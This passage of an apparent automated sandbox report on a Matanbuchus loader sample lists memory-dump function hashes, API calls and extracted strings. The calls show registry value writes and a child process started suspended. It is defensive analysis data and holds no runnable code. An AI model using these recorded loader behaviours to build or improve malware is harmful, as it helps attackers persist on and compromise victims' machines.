                                                                  • Opcode Fuzzy Hash: 6a4520f36a809a18397db0f2ab063229439142230a76a1cf20750397584d6650
                                                                  • Instruction Fuzzy Hash: 965172B1E00219EFDF05CF99D940AEEBBB6EF88304F19805DE415AB205D734AA50DF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6da16525bf5588034099ad3ebae02f39126e56f85074f42ce83d4094566c102d
                                                                  • Instruction ID: 36c0f2b3a633cc403d2930f571a0c4174fe68b0e06618f850b3222c2b716c7ca
                                                                  • Opcode Fuzzy Hash: 6da16525bf5588034099ad3ebae02f39126e56f85074f42ce83d4094566c102d
                                                                  • Instruction Fuzzy Hash: EA818DB8E04259DFCB04CF98D590AEDBBB2FF48304F20815AD855AB355D734AA85CF94
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6750dc95a881e0ba319b8d51a47873d370098e00a8ed0d55af29bcb13d909daf
                                                                  • Instruction ID: 9f300749cc8c4a5b07c99d7537bf00db3374c2ded7d2973216408230885dff46
                                                                  • Opcode Fuzzy Hash: 6750dc95a881e0ba319b8d51a47873d370098e00a8ed0d55af29bcb13d909daf
                                                                  • Instruction Fuzzy Hash: 80718E78E00219CBCB18CF99D490AEDFBB2FF48310F24819AE859A7355D734AA81CF54
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a81ac5fefb6689b28e7d3d515c49c4fbaa181e5f075f0e7c0c759a794e5351dc
                                                                  • Instruction ID: cfb13ec82082ec78b1d30cf0002ad860d791df36d6da3608e91d4a03b3155630
                                                                  • Opcode Fuzzy Hash: a81ac5fefb6689b28e7d3d515c49c4fbaa181e5f075f0e7c0c759a794e5351dc
                                                                  • Instruction Fuzzy Hash: 97616DB8E04259DFCB14CF99D590AAEFBB2FF88304F24825AD815AB355D730AA45CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 62509378abaa459587042215145ccaa329c69774e4d554f83ed17055aacb7123
                                                                  • Instruction ID: ea674ec221a8427dcc916f305e076a9f5950b01a651e2e85f5bd93e8c28e4657
                                                                  • Opcode Fuzzy Hash: 62509378abaa459587042215145ccaa329c69774e4d554f83ed17055aacb7123
                                                                  • Instruction Fuzzy Hash: 86617FB8E05259DFCB04CFA8D490AADFBB1BF48305F248159D859AB345D735AA42CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                  • Instruction ID: 7145a24a49d9840210b629bae7a5c9ebb9ab3aa7fb7d5282f47ae1fc01689732
                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                  • Instruction Fuzzy Hash: 70110BB7A4524143D6038539F6B05FAA3B5EBC52317796379D0538B6D8E322B147B500
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 72cabed2e7669a9d7fa27a6f250bdc3026b6031ad8b31f1e6270bd0d0c09ef73
                                                                  • Instruction ID: a9586d2833cf50a3fc9e91361093e852b8360205f73869e5bdf75373e54783f5
                                                                  • Opcode Fuzzy Hash: 72cabed2e7669a9d7fa27a6f250bdc3026b6031ad8b31f1e6270bd0d0c09ef73
                                                                  • Instruction Fuzzy Hash: 7AF09673760368DBCB02CAECE505B9577BCE706A10F215146F602DB290D2A4EF40CBC0
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 045c068c9b4993117c9950ff781f0dc352064a25b1db4508318fbc32f48eaee0
                                                                  • Instruction ID: 32344a36ebb7533ea4fcba32ba2cf30c78edf4d3e6381707273fe020436912b8
                                                                  • Opcode Fuzzy Hash: 045c068c9b4993117c9950ff781f0dc352064a25b1db4508318fbc32f48eaee0
                                                                  • Instruction Fuzzy Hash: 92F0A476D403189BDF65DB68DC44EC6B3BCEF40210F810560E565E7125E730F945CA80
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 37f358bf5c53292e174a2d05818f6df3e767822dea00c5dffb3dd2e698e653a7
                                                                  • Instruction ID: 1caa851709528bbe31e34d4646f4481fca84192267fbf8e80d27f08d0692cff6
                                                                  • Opcode Fuzzy Hash: 37f358bf5c53292e174a2d05818f6df3e767822dea00c5dffb3dd2e698e653a7
                                                                  • Instruction Fuzzy Hash: 49F03072A20368EBCB16CB4CD545B4973BDEB45B54F21005AF902DB280D6B4EE00C7D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 743f8f6ed7d3dafc849b8407b333ca00744b702c402de91a5cb1d0c5c83d8951
                                                                  • Instruction ID: 269aa4c7d26f85398a962a8667da2433f23c7306820656da8abd706c8eb6801f
                                                                  • Opcode Fuzzy Hash: 743f8f6ed7d3dafc849b8407b333ca00744b702c402de91a5cb1d0c5c83d8951
                                                                  • Instruction Fuzzy Hash: CBE08C72A212BCEBCB12CBD8D904D8AB3FCEB49A00B210496B902D3100D274DF00C7C0
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3d38f8285bf4b725786fbd66e075ee47408d2e1b61d09f82d003a7d56089bb9f
                                                                  • Instruction ID: 60776618c297837a0b5dd17e255b3e01a8a0b9c4b63d0eed260dd04961fca249
                                                                  • Opcode Fuzzy Hash: 3d38f8285bf4b725786fbd66e075ee47408d2e1b61d09f82d003a7d56089bb9f
                                                                  • Instruction Fuzzy Hash: 03C080381017418ACD054520D770B983365E3956C5F5004CCC4030BA41F51D6841DF11
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 517683b43767a3535c157b2b51665dec237b95770994ae3f6177b6cbaedc1245
                                                                  • Instruction ID: 7cacbbe88ecc4cab0eaef6d20cf23e499f9f73f380761552353fd898b1fb0951
                                                                  • Opcode Fuzzy Hash: 517683b43767a3535c157b2b51665dec237b95770994ae3f6177b6cbaedc1245
                                                                  • Instruction Fuzzy Hash: 14D0127490560CEBC704CF49D540959F7F8EB48650F208199EC0C83700D632AE01CA80
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
                                                                  • Instruction ID: 0230c4de2727f5ca7c94c7bd14938b1f1fc6463ea35c1893f292ab52552c7abd
                                                                  • Opcode Fuzzy Hash: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
                                                                  • Instruction Fuzzy Hash: 8CB011322A2B88CBC202CA8CE080E80B3ECE308E20F0000A0E80883B22C228FC00C880
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: *$+$,$1$7$7$;$>$X$i$ivh$u$w
                                                                  • API String ID: 0-285284801
                                                                  • Opcode ID: 1d0aa34789b0a4e179efb51e132364a04e93c0360b614ad2541e3765a7e1d627
                                                                  • Instruction ID: a0f8f1a595bff7c2774db474667c170cc3e975433f41593616672a56218394b2
                                                                  • Opcode Fuzzy Hash: 1d0aa34789b0a4e179efb51e132364a04e93c0360b614ad2541e3765a7e1d627
                                                                  • Instruction Fuzzy Hash: 4BB12474E04388DFEB01CFA8D854BDEBBB2BF48304F104159E945AB381D7B96A45CB61
                                                                  APIs
                                                                  • GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 7FB4ED54
                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,?,?,?), ref: 7FB4ED78
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Module$FileHandleName
                                                                  • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
                                                                  • API String ID: 4146042529-3261600717
                                                                  • Opcode ID: 1c7803af7b804b0092c63bba5d0a2c9b5149d9c882153342942929e9f2d6a94c
                                                                  • Instruction ID: 55577783266002fc53b4b4075e4c02c6cf8d9b0f33c29d2c0a07b82e0a465141
                                                                  • Opcode Fuzzy Hash: 1c7803af7b804b0092c63bba5d0a2c9b5149d9c882153342942929e9f2d6a94c
                                                                  • Instruction Fuzzy Hash: 24C1F871A0031967DB115B28FE44FFBB37ADF98304F081668ED16DB255F734BA428AA1
                                                                  APIs
                                                                  Strings
                                                                  • x < 0 and x < (std::numeric_limits<number_integer_t>::max)(), xrefs: 7FAEC283
                                                                  • @, xrefs: 7FAEC40D
                                                                  • d, xrefs: 7FAEC39C
                                                                  • d, xrefs: 7FAEC2E0
                                                                  • d, xrefs: 7FAEC445
                                                                  • n_chars < number_buffer.size() - 1, xrefs: 7FAEC429
                                                                  • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7FAEC27E, 7FAEC424
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __aullrem
                                                                  • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$n_chars < number_buffer.size() - 1$x < 0 and x < (std::numeric_limits<number_integer_t>::max)()
                                                                  • API String ID: 3758378126-3644039597
                                                                  • Opcode ID: c3d3aea3c7c4d3ef1950d0cc9a0ea6f5d57510d257e06ed714f05c26dc13dc36
                                                                  • Instruction ID: 04fc91e164f7d07dd98816ed2725dba89a696632bb77c1cab28388428b740539
                                                                  • Opcode Fuzzy Hash: c3d3aea3c7c4d3ef1950d0cc9a0ea6f5d57510d257e06ed714f05c26dc13dc36
                                                                  • Instruction Fuzzy Hash: B1F1E174D01219DFDB14CF99C892BDDBBB2BF48304F1081AAD91AAB358D7386A84CF54
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __aulldiv__aullrem
                                                                  • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$false$n_chars < number_buffer.size() - 1
                                                                  • API String ID: 3839614884-178659603
                                                                  • Opcode ID: f43839eba6bbd9a2cf60154f0c2d4c5d50f0dec58f6b0732064f24939c2fad2b
                                                                  • Instruction ID: d0715f681ad450fc7fa18acad99bd5d51d39acb8fe8382571ebce40d1eb51031
                                                                  • Opcode Fuzzy Hash: f43839eba6bbd9a2cf60154f0c2d4c5d50f0dec58f6b0732064f24939c2fad2b
                                                                  • Instruction Fuzzy Hash: 20E1B278E01219DFDB14CF99C981B9DBBB2FF48304F2081AAD519AB358D7386A85CF54
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE,00000000,000F003F,00000000,00000044,00000000), ref: 7FB3EF39
                                                                  • wsprintfW.USER32 ref: 7FB3EF86
                                                                  • RegCreateKeyExW.ADVAPI32(00000000,?,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 7FB3EFA3
                                                                  • RegSetValueExW.ADVAPI32(00000000,bbb,00000000,00000003,00000000,?), ref: 7FB3EFC4
                                                                  • RegSetValueExW.ADVAPI32(00000000,kkk,00000000,00000003,?,0000000F), ref: 7FB3EFE4
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 7FB3EFFD
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 7FB3F008
                                                                    • Part of subcall function 7FB3F6E7: GetTickCount.KERNEL32 ref: 7FB3F705
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseValue$CountCreateOpenTickwsprintf
                                                                  • String ID: %s_%x%x$SOFTWARE$bbb$kkk
                                                                  • API String ID: 730945307-550109914
                                                                  • Opcode ID: 33c3d055346ebb017d86c753ae83414295aedc34c7626f010c902e86706d3a58
                                                                  • Instruction ID: e97f7e88521870fc4ff8eaa7eb87ff367e314be6bde9e854865847148bbfa3a7
                                                                  • Opcode Fuzzy Hash: 33c3d055346ebb017d86c753ae83414295aedc34c7626f010c902e86706d3a58
                                                                  • Instruction Fuzzy Hash: AF314B72A00218BAEB219AA6DC49FDFBF7DEF04364F500065F605EA050D770AA59DBA0
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?), ref: 7FB3F149
                                                                  • IsWow64Process.KERNEL32(00000000), ref: 7FB3F150
                                                                  • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 7FB3F18C
                                                                  • wsprintfW.USER32 ref: 7FB3F21A
                                                                  • CloseHandle.KERNEL32(00000000), ref: 7FB3F3A5
                                                                  • CloseHandle.KERNEL32(00000000), ref: 7FB3F3B0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process$CloseHandle$CreateCurrentWow64wsprintf
                                                                  • String ID: 0x%x$?
                                                                  • API String ID: 3386633596-4137330559
                                                                  • Opcode ID: 8b2a404ff1f1da5771fb033dd10a8964dc2370a1fd721235ddd5a4e492ec5c05
                                                                  • Instruction ID: fcd495d2b6cc0d3663a9c46ce6a701ebb4c7ce64de310544c6c556e8174c9810
                                                                  • Opcode Fuzzy Hash: 8b2a404ff1f1da5771fb033dd10a8964dc2370a1fd721235ddd5a4e492ec5c05
                                                                  • Instruction Fuzzy Hash: 3A8149B2D40208BFEF199BA5DD85FEFB7BDEF08244F540065E916E6150EB31AE448B60
                                                                  APIs
                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,7FB5FF5F), ref: 7FB6060C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DecodePointer
                                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                  • API String ID: 3527080286-3064271455
                                                                  • Opcode ID: fde260e19d8f580aeb2752fc7ab7f97bf0e74817f7f2018d9b7219409ec950c8
                                                                  • Instruction ID: 81eb686c6a399e3c9652657fcaf6e851ab327a31242d9c23f182a6cc3b15dee6
                                                                  • Opcode Fuzzy Hash: fde260e19d8f580aeb2752fc7ab7f97bf0e74817f7f2018d9b7219409ec950c8
                                                                  • Instruction Fuzzy Hash: 625199B980060ACBDB019F67F8481FDBF78FF45390F214285D496AA25CEB74A521CF54
                                                                  APIs
                                                                  • type_info::operator==.LIBVCRUNTIME ref: 7FB442D0
                                                                  • ___TypeMatch.LIBVCRUNTIME ref: 7FB443DE
                                                                  • _UnwindNestedFrames.LIBCMT ref: 7FB44530
                                                                  • CallUnexpected.LIBVCRUNTIME ref: 7FB4454B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 2751267872-393685449
                                                                  • Opcode ID: 0a8a1778b1a0e45dbaf1060a7ffec5dbb37c4bd1ce4edd1ecf1b5d7eb65d2c09
                                                                  • Instruction ID: b5e695cc74e73d29a934ebda2c7e372730dd7da7e382aa48f753bc334f979e87
                                                                  • Opcode Fuzzy Hash: 0a8a1778b1a0e45dbaf1060a7ffec5dbb37c4bd1ce4edd1ecf1b5d7eb65d2c09
                                                                  • Instruction Fuzzy Hash: 43B18EB1804309EFCF16CFA4EA409AEB7B5FF04310B546159EC126B255E731EA61EFA1
                                                                  APIs
                                                                  • _ValidateLocalCookies.LIBCMT ref: 6C33FEB7
                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 6C33FEBF
                                                                  • _ValidateLocalCookies.LIBCMT ref: 6C33FF48
                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 6C33FF73
                                                                  • _ValidateLocalCookies.LIBCMT ref: 6C33FFC8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322575419.000000006C311000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C310000, based on PE: true
                                                                  • Associated: 00000005.00000002.3322561944.000000006C310000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322600793.000000006C34B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322617432.000000006C35A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322682909.000000006C56D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322765446.000000006C807000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322781439.000000006C808000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6c310000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 1170836740-3733052814
                                                                  • Opcode ID: 855d124eab9e4362a8b692eb12fefe62c3268a7af830aa10b90d46e84e38f4d3
                                                                  • Instruction ID: 46383d23cd8868c66e7483159a76a087ee62b9c22a3912d4c44b61c28bd3b13f
                                                                  • Opcode Fuzzy Hash: 855d124eab9e4362a8b692eb12fefe62c3268a7af830aa10b90d46e84e38f4d3
                                                                  • Instruction Fuzzy Hash: 3D51A034A012599FCF00DF68C840AAE7BF5AF4A31DF54C199E8189BBA2C732D955CF91
                                                                  APIs
                                                                  • IsCharLowerA.USER32(00000073), ref: 7FB3C78A
                                                                  • GetModuleFileNameW.KERNEL32(00000000,kernel32,00000000), ref: 7FB3C7AA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CharFileLowerModuleName
                                                                  • String ID: 9mD$kernel32$u${
                                                                  • API String ID: 515556390-2230072418
                                                                  • Opcode ID: b9789f784db8903e407090245f01732676825da5c235b7c55ed6f3411e96e109
                                                                  • Instruction ID: 5047ed8406a26d53083d2d3189ebc311f11be424d44ac863f910fc29a5dd6a68
                                                                  • Opcode Fuzzy Hash: b9789f784db8903e407090245f01732676825da5c235b7c55ed6f3411e96e109
                                                                  • Instruction Fuzzy Hash: 8AB128B9D05258CEDB60CFAAC8407ADBBF1FF48310F24819AD459A7395E7345A86CF60
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 6C334DE7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322575419.000000006C311000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C310000, based on PE: true
                                                                  • Associated: 00000005.00000002.3322561944.000000006C310000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322600793.000000006C34B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322617432.000000006C35A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322682909.000000006C56D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322765446.000000006C807000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322781439.000000006C808000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6c310000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: DirectorySystem
                                                                  • String ID: ($8$?2$GB$r
                                                                  • API String ID: 2188284642-435796455
                                                                  • Opcode ID: 175414274870735e6fbdf3ae76061003a31a973cd488d880ec7b2308c9519725
                                                                  • Instruction ID: e5abd3662c20c3d8fb97b8bff442c002eec767fcb057842190f0f9bf27a119dc
                                                                  • Opcode Fuzzy Hash: 175414274870735e6fbdf3ae76061003a31a973cd488d880ec7b2308c9519725
                                                                  • Instruction Fuzzy Hash: F4713AB4A042988FCF14CFA9C4816BDBFF5BB4A300F54819AD498E7385E7384645EFA5
                                                                  APIs
                                                                  • _ValidateLocalCookies.LIBCMT ref: 7FB43C17
                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 7FB43C1F
                                                                  • _ValidateLocalCookies.LIBCMT ref: 7FB43CA8
                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 7FB43CD3
                                                                  • _ValidateLocalCookies.LIBCMT ref: 7FB43D28
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                  • String ID: csm
                                                                  • API String ID: 1170836740-1018135373
                                                                  • Opcode ID: 89cd8b925d97a44cdb95f348b26597439550d5f98cdefcb8d4dc909645d04f87
                                                                  • Instruction ID: 981725c879f66ce917938bd5c6d325d6b2a5fd86c1ece4124c4aad596b70f460
                                                                  • Opcode Fuzzy Hash: 89cd8b925d97a44cdb95f348b26597439550d5f98cdefcb8d4dc909645d04f87
                                                                  • Instruction Fuzzy Hash: 9B41C574A00308ABCF00DF69EA80AAEBBB5FF44264F188155DC155B792D731EA19FB90
                                                                  APIs
                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 6C33D09A
                                                                  • Sleep.KERNEL32(00000064), ref: 6C33D0A7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322575419.000000006C311000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C310000, based on PE: true
                                                                  • Associated: 00000005.00000002.3322561944.000000006C310000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322600793.000000006C34B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322617432.000000006C35A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322682909.000000006C56D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322765446.000000006C807000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322781439.000000006C808000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6c310000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: DirectorySleepWindows
                                                                  • String ID: )$X$Z$t
                                                                  • API String ID: 1499897475-3436847989
                                                                  • Opcode ID: 19223de426a5208e2c092cf54c1a53efe632f223edc723a2aa25c92f897060a8
                                                                  • Instruction ID: 88ad367467766313fc99e8239c077c33847529972c76ce7df01eeba54ecba626
                                                                  • Opcode Fuzzy Hash: 19223de426a5208e2c092cf54c1a53efe632f223edc723a2aa25c92f897060a8
